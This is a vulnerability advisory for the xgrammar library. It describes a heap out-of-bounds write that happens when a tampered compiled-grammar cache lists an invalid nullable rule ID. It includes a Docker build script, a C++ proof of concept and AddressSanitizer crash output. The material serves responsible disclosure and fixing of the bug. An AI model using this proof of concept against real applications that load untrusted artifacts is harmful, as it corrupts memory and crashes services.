Out-of-Bounds Write Through Deserialized Nullable Rule IDs
Affected repository: mlc-ai/xgrammar
Observed HEAD: a1a3904fa80316b9fc0f1940285e7792bd2071f7
Sink: cpp/earley_parser.cc:487 in xgrammar::EarleyParser::EarleyParser
Sanitizer verdict: AddressSanitizer heap-buffer-overflow, WRITE of size 1
Summary
CompiledGrammar::DeserializeJSON accepts rule IDs in grammar.allow_empty_rule_ids without
checking that they identify a rule in the deserialized grammar. An attacker who can cause an
application to restore an untrusted compiled-grammar cache can put [1] in a one-rule artifact.
The artifact is accepted, and constructing GrammarMatcher then uses 1 as an unchecked index
into a one-byte nullable-rule vector. AddressSanitizer records a one-byte out-of-bounds write and
process abort during matcher construction.
Detail
The broken invariant crosses deserialization and matcher initialization: every member of
allow_empty_rule_ids must be in the half-open range [0, grammar.NumRules()), but the trust
boundary checks only the JSON representation, not that semantic relationship.
In cpp/compiled_grammar.cc, DeserializeJSONValue asks the generic reflection-based
deserializer to restore the nested Grammar:
if (object.find("grammar") == object.end()) {
return ConstructDeserializeError("Expect a 'grammar' field", type_name);
}
AutoDeserializeJSONValue(&(impl->grammar), object["grammar"], type_name);
The generic deserializer verifies that allow_empty_rule_ids is an array of integers and converts
each value to int32_t; it does not know that those integers index Grammar::Impl::rules_.
Consequently, the syntactically valid value 1 survives in a grammar containing one rule, even
though the only valid rule ID is 0. CompiledGrammar::DeserializeJSON returns the inconsistent
object as usable.
GrammarMatcher construction creates an EarleyParser. Its constructor sizes
rule_is_nullable_ from the trusted rule count and then treats every deserialized nullable-rule ID
as an index:
EarleyParser::EarleyParser(const Grammar& grammar, std::optional<ParserState> initial_state)
: grammar_(grammar),
fsm_state_flags_cache_(grammar->NumRules()),
rule_is_nullable_(grammar->NumRules(), 0) {
// ...
for (int32_t rule_id : grammar_->allow_empty_rule_ids) {
rule_is_nullable_[rule_id] = true;
}
For the PoC grammar, NumRules() is 1, so rule_is_nullable_ owns one byte at index 0.
Index 1 writes exactly one byte past that allocation. A negative ID is also unsafe because
std::vector::operator[] converts it to an unsigned index. This path requires control of a
serialized CompiledGrammar artifact and an application that deserializes it and constructs a
matcher. Ordinary EBNF compilation computes valid nullable IDs internally, so grammar text alone
does not reach the vulnerable path. The demonstrated impact is memory corruption and process
abort; code execution was not demonstrated.
Reproduce
Run this command in a disposable Docker environment. It shallow-clones the current default branch,
prints the resolved revision, builds the public C++ library with AddressSanitizer, modifies a
serialized one-rule grammar through the public API, and constructs GrammarMatcher. The
non-interactive debugger disables only ASan's unstable SIGSEGV handler so ASan can emit the full
heap-buffer-overflow diagnostic.
docker run --rm -i debian:bookworm-slim bash <<'DOCKER'
set -euxo pipefail
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++ gdb
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git submodule update --init --recursive --depth 1
git rev-parse HEAD
cat > config.cmake <<'CMAKE'
set(CMAKE_BUILD_TYPE Debug)
set(XGRAMMAR_BUILD_PYTHON_BINDINGS OFF)
set(XGRAMMAR_BUILD_CXX_TESTS OFF)
set(XGRAMMAR_ENABLE_CPPTRACE OFF)
set(XGRAMMAR_ENABLE_INTERNAL_CHECK OFF)
CMAKE
cmake -S . -B build -G Ninja \
-DCMAKE_CXX_FLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
-DCMAKE_EXE_LINKER_FLAGS='-fno-lto -fsanitize=address'
cmake --build build --target xgrammar -j2
cat > /tmp/repro.cc <<'CPP'
#include <picojson.h>
#include <xgrammar/compiler.h>
#include <xgrammar/matcher.h>
#include <xgrammar/tokenizer_info.h>
#include <cstdint>
#include <iostream>
#include <string>
#include <utility>
#include <variant>
int main() {
xgrammar::TokenizerInfo tokenizer({"a"});
xgrammar::GrammarCompiler compiler(tokenizer, 1, false);
xgrammar::CompiledGrammar compiled = compiler.CompileGrammar("root ::= \"a\"");
picojson::value artifact;
const std::string parse_error = picojson::parse(artifact, compiled.SerializeJSON());
if (!parse_error.empty()) return 2;
auto& artifact_object = artifact.get<picojson::object>();
auto& grammar_object = artifact_object.at("grammar").get<picojson::object>();
picojson::array invalid_rule_ids;
invalid_rule_ids.emplace_back(static_cast<int64_t>(1));
grammar_object["allow_empty_rule_ids"] = picojson::value(std::move(invalid_rule_ids));
auto restored = xgrammar::CompiledGrammar::DeserializeJSON(artifact.serialize(), tokenizer);
if (!std::holds_alternative<xgrammar::CompiledGrammar>(restored)) {
std::cerr << "DESERIALIZATION_REJECTED\n";
return 3;
}
std::cerr << "DESERIALIZATION_ACCEPTED\n";
xgrammar::GrammarMatcher matcher(std::get<xgrammar::CompiledGrammar>(std::move(restored)));
return 0;
}
CPP
g++ -std=c++17 -D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address \
-fno-omit-frame-pointer -g \
-Iinclude -I3rdparty/picojson -I3rdparty/dlpack/include \
/tmp/repro.cc build/libxgrammar.a -pthread -ldl -o /tmp/repro
gdb -q -batch \
-ex 'set environment ASAN_OPTIONS handle_segv=0:detect_leaks=0' \
-ex run -ex quit --args /tmp/repro
DOCKER
The run at the revision shown above produced:
DESERIALIZATION_ACCEPTED
=================================================================
ERROR: AddressSanitizer: heap-buffer-overflow
WRITE of size 1
#0 in xgrammar::EarleyParser::EarleyParser(...) cpp/earley_parser.cc:487
#1 in xgrammar::GrammarMatcher::Impl::Impl(...) cpp/grammar_matcher.cc:475
0 bytes to the right of 1-byte region
SUMMARY: AddressSanitizer: heap-buffer-overflow in xgrammar::EarleyParser::EarleyParser(...)
ABORTING
Credit
Zheng Yu @ Depthfirst